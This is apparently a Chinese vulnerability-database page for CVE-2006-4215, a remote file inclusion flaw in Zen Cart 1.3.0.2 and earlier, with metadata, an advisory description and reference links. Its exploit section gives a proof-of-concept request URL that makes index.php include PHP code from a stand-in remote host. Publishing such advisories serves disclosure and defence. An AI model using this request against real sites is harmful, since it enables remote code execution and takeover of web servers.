Zen Cart 'index.php'HP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110821 漏洞类型 代码注入
发布时间 2006-08-15 更新时间 2006-08-31
CVE编号 CVE-2006-4215 CNNVD-ID CNNVD-200608-290
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/28392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-290
|漏洞详情
ZenCart1.3.0.2及早期版本的index.php脚本存在PHP远程文件包含漏洞,当register_globals启用时,远程攻击者可借助autoLoadConfig[999][0][loadFile]参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19543/info

Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable.

http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
|参考资料

来源:BID
名称:19543
链接:http://www.securityfocus.com/bid/19543
来源:MISC
链接:http://www.gulftech.org/?node=research&article_id=00109-08152006
来源:VUPEN
名称:ADV-2006-3283
链接:http://www.frsirt.com/english/advisories/2006/3283
来源:SECUNIA
名称:21484
链接:http://secunia.com/advisories/21484
来源:XF
名称:zencart-autoloadconfig-file-include(28394)
链接:http://xforce.iss.net/xforce/xfdb/28394
来源:OSVDB
名称:28149
链接:http://www.osvdb.org/28149